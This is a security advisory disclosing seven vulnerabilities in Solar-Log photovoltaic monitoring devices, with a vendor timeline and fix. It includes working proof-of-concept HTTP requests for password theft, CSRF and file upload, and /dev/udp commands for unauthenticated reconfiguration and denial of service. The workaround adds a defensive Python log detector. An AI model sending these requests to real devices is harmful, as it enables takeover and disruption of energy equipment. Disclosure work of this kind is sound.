SEC Consult SA-20170322-0 :: Multiple vulnerabilities in Solare Datensysteme Solar-Log devices

SEC Consult Vulnerability Lab Security Advisory < 20170322-0 >
=======================================================================
              title: Multiple vulnerabilities
            product: Solare Datensysteme GmbH
                     Solar-Log 250/300/500/800e/1000/1000 PM+/1200/2000
 vulnerable version: Firmware 2.8.4-56 / 3.5.2-85
      fixed version: Firmware 3.5.3-86
         CVE number: -
             impact: Critical
           homepage: http://www.solar-log.com/de/home.html
              found: 2017-01-23
                 by: T. Weber (Office Vienna)
                     SEC Consult Vulnerability Lab

                     An integrated part of SEC Consult
                     Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
                     Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

                     https://www.sec-consult.com
=======================================================================

Vendor description:
-------------------
"Solare Datensysteme GmbH (SDS) is headquartered in the southern German city
of Binsdorf and specialises in the development and sale of monitoring systems
for photovoltaic plants. The company was founded in 2007 by Thomas Preuhs and
Jörg Karwath and was created from the company "TOP Solare Datensysteme". This
company had been developing and selling the "SolarLog™" product range since
2005. Our core competence covers innovative products with short development
cycles and an excellent cost/performance ratio. Our developments have the
outstanding characteristics of high customer value, simple operation and
universal application without requiring time-consuming installation of
software."

Source: http://www.solar-log.uk/gb-en/unternehmen/ueber-uns.html


Business recommendation:
------------------------
SEC Consult recommends immediately installing the available firmware update
and restricting network access.

Furthermore, this device should not be used in production until a thorough
security review has been performed by security professionals and all
identified issues have been resolved.


Vulnerability overview/description:
-----------------------------------
1) Unauthenticated Download of Configuration including Device-Password
This vulnerability is present at least on firmware 2.8.4-56.

An attacker can download the configuration file without authentication and
extract the password to log in to the Solar-Log. Therefore, an attacker can
gain administrative access to such a device without prior authentication.


2) Cross-Site Request Forgery (CSRF)
This vulnerability is present at least on firmware 3.5.2-85.

A CSRF vulnerability enables an attacker to remove/modify a password of a
device by luring an authenticated user to click on a crafted link. An attacker
is able to take over the device by exploiting this vulnerability.


3) Unauthenticated Arbitrary File Upload
This vulnerability is present at least on firmware 3.5.2-85.

Arbitrary files can be uploaded to the Solar-Log by using a crafted POST
request. An attacker can host a malicious website or use the Solar-Log as a
share to store any (illegal) content.


4) Information Disclosure (CVE-2001-1341)
All Solar-Log devices in the current firmware versions are prone to this
information disclosure vulnerability. (2.8.4-56 / 3.5.2-85)

The network configuration of the internal network including the gateway and
the MAC address of the device are leaked.

All details of the IPC@CHIP from Beck IPC (https://www.beck-ipc.com/) like RTOS
version and serial number are leaked as well.


5) Unauthenticated Change of Network-Configuration
All Solar-Log devices in the current firmware versions are prone to this
vulnerability. (2.8.4-56 / 3.5.2-85)

Since the Solar-Log is based on the chips of Beck IPC, a UDP configuration
server is enabled by default. This server allows the IP configuration to be
changed over a specific UDP port. This functionality can be protected with a
password, but this is not set in the affected firmware versions.

The MAC address, which is leaked by 4), is needed to configure the device.
An attacker can reconfigure the device without any authentication.


6) Unauthenticated Denial of Service
All Solar-Log devices in the current firmware versions are prone to this
vulnerability. (2.8.4-56 / 3.5.2-85)

The Beck IPC UDP configuration server on the Solar-Log device can be attacked
with arbitrary UDP packets to permanently disable the Solar-Log until a manual
reboot is triggered.


7) Potential Unauthenticated Reprogram of IPC@CHIP Flash Memory
Potentially available in all Solar-Log devices in the current firmware
versions. (2.8.4-56 / 3.5.2-85)

Since the "CHIPTOOL" from BECK IPC enables a developer to reprogram the chip
over the network via UDP, a missing password can also enable an attacker to do
this on a Solar-Log device. This action can lead to a simple Denial of Service
or a complex botnet of Solar-Log devices!


Proof of concept:
-----------------
1) Unauthenticated Download of Configuration including Device-Password
The full configuration is exposed by sending the following GET-request:
-------------------------------------------------------------------------------
GET /data/misc.dat HTTP/1.1
Host: <IP-Address>
[...]
-------------------------------------------------------------------------------
Since the response contains the password, an attacker can easily take
control over the device.


2) Cross-Site Request Forgery
By luring the user to issue the following request, the password is removed:
-------------------------------------------------------------------------------
POST /setjp HTTP/1.1
Host: <IP-Address>

preval=none;postval=105;{"221":"0","223":"0","225":"1","287":"","288":{"0":"0","1":"0"},"440":"0"}
-------------------------------------------------------------------------------

By luring the user to issue the following request, the password is modified:
-------------------------------------------------------------------------------
POST /setjp HTTP/1.1
Host: <IP-Address>

preval=none;postval=105;{"221":"0","223":"1","224":"<New-Password>","225":"1","287":"","288":{"0":"0","1":"0"},"440":"0"}
-------------------------------------------------------------------------------


3) Unauthenticated Arbitrary File Upload
Any files can be uploaded by using the following POST-request:
-------------------------------------------------------------------------------
POST /menu/d_debug_db.html HTTP/1.1
Host: <IP-Address>
[...]
Referer: http://<IP-Address>/menu/d_debug_db.html
Content-Type: multipart/form-data; boundary=--------301473270
Content-Length: 341

----------301473270
Content-Disposition: form-data; name="DESTINATION-PATH"

PoC.html
----------301473270
Content-Disposition: form-data; name="FILE-CONTENT"; filename="file.txt"
Content-Type: text/plain

<html>
 <head>
 <title>SEC-Test</title>
 </head>
 <body>
 <script>alert("XSS-PoC");</script>
 </body>
</html>
----------301473270
Content-Disposition: form-data; name="L_UPLOAD"

Hochladen
----------301473270--
-------------------------------------------------------------------------------

The uploaded content can be reached by this link:
http://<IP-Address>/PoC.html


4) Information Disclosure (CVE-2001-1341)
This vulnerability is a known issue to IPC@CHIP since 2001.
See: http://www.securityfocus.com/bid/2767/info

The following URL can be used to open the "ChipCfg" file on a Solar-Log device:
http://<IP-Address>/ChipCfg

If an attacker is in the same subnet, he can directly request this information
from the device (the device responds to multicast) with the following command:
$ echo -n "0 1 A" >/dev/udp/<Target-IP>/8001


5) Unauthenticated Change of Network-Configuration
By using the following command, a change of the network configuration can be
triggered unauthenticated on UDP port 8001:
$ echo -n "<MAC> 4 2 0 <Desired-IP-Address> <Desired-Netmask> <Desired-Gateway>" \
  >/dev/udp/<Target-IP>/8001

Example:
$ echo -n "001122334455 4 2 0 192.168.4.5 255.255.255.0 192.168.4.254" \
  >/dev/udp/192.168.4.9/8001


6) Unauthenticated Denial of Service
By using arbitrary null characters the IPC@CHIP can be pushed into an
undesired state:
$ echo -n "<MAC> 0 <IP-Address> <Netmask> <Gateway> DDDD" \
  >/dev/udp/<Target-IP>/8001

Example:
$ echo -n "001122334455 0 192.168.4.5 255.255.255.0 192.168.4.254 DDDD0" \
  >/dev/udp/192.168.4.5/8001


7) Potential Unauthenticated Reprogram of IPC@CHIP Flash Memory
This action was not tested against the device. Such an attack can brick the
Solar-Log. The worst case scenario would be a botnet exploiting this
vulnerability.

A network-dump of the "CHIPTOOL" would be enough to reconstruct the required
UDP packets for the attack.


Vulnerable / tested versions:
-----------------------------
Solar-Log 1200 - 3.5.2-85
Solar-Log 800e - 2.8.4-56

Since the firmware for the other Solar-Log devices is exactly the same,
other devices with the same versions are also prone to the vulnerabilities!


Vendor contact timeline:
------------------------
2017-02-02: Contacting vendor via info@solar-log.com, support@solar-log.com
            and berlin@solar-log.com.
2017-02-14: Vendor responds and requests the advisory unencrypted; Sent the
            advisory unencrypted to the vendor.
2017-02-20: Asked for an update.
2017-02-21: Vendor states that the patch is in development. The update will
            be published before 2017-03-24.
2017-03-14: Asked for a status update. Vendor states that the update will
            be available on 2017-03-21.
2017-03-20: Vendor sends release notes. New firmware version is 3.5.3 build
            86 for all affected Solar-Log devices.
            Informing the vendor that the release of the advisory is set to
            2017-03-22.
2017-03-22: Public advisory release.


Solution:
---------
Upgrade to firmware 3.5.3-86
http://www.solar-log.com/de/service-support/downloads/firmware.html


Workaround:
-----------
Restrict network access to the devices.
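
While devices are being upgraded, proxy or web-server logs can be checked for
the HTTP requests shown in proof-of-concept items 1) to 4). The following is
an added example, not part of the SEC Consult advisory or the vendor's
software; the log layout, the management network 192.168.4.0/24, the sample
lines and all function names are assumptions.

```python
import ipaddress
import re
from urllib.parse import urlsplit

# Assumption: the devices are administered only from this network.
MGMT_NET = ipaddress.ip_network("192.168.4.0/24")

# (method, lower-cased path) of each proof-of-concept request -> finding.
RULES = {
    ("GET", "/data/misc.dat"): "1) configuration download",
    ("POST", "/setjp"): "2) password change via /setjp",
    ("POST", "/menu/d_debug_db.html"): "3) file upload",
    ("GET", "/chipcfg"): "4) ChipCfg disclosure",
}

# Assumed log layout: src dst "METHOD target HTTP/x" status "referer"
LINE = re.compile(r'([\d.]+) ([\d.]+) "([A-Z]+) (\S+) HTTP/[\d.]+" \d{3} "([^"]*)"')

SAMPLE_LOG = [  # constructed lines, not captured traffic
    '10.9.8.7 192.168.4.9 "GET /data/misc.dat HTTP/1.1" 200 "-"',
    '192.168.4.20 192.168.4.9 "POST /setjp HTTP/1.1" 200 "http://192.168.4.9/"',
    '192.168.4.20 192.168.4.9 "POST /setjp HTTP/1.1" 200 "http://forum.example/p"',
    '10.9.8.7 192.168.4.9 "POST /menu/d_debug_db.html HTTP/1.1" 200 "-"',
    '10.9.8.7 192.168.4.9 "GET /ChipCfg?x HTTP/1.1" 200 "-"',
]

def check_request(line):
    """Return (finding, reason) for a request worth reviewing, else None."""
    m = LINE.match(line)
    if not m:
        return None
    src, dst, method, target, referer = m.groups()
    finding = RULES.get((method, target.split("?", 1)[0].lower()))
    try:
        outside = ipaddress.ip_address(src) not in MGMT_NET
    except ValueError:  # malformed address field
        return None
    if finding and outside:
        return finding, "source outside management network"
    # Assumption: the device's own pages also POST to /setjp, so inside the
    # management network only a Referer naming another host is flagged.
    if finding == RULES["POST", "/setjp"] and urlsplit(referer).hostname not in (None, dst):
        return finding, "cross-site Referer"
    return None

def scan(lines):
    """Return [(line_number, finding, reason)] for every flagged line."""
    found = ((n, check_request(text)) for n, text in enumerate(lines, 1))
    return [(n, *hit) for n, hit in found if hit]
```

UDP port 8001 traffic from items 5) to 7) does not appear in HTTP logs and has
to be reviewed in firewall or flow records instead.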


Advisory URL:
-------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/Career.htm

Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/About/Contact.htm
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

EOF T. Weber / @2017

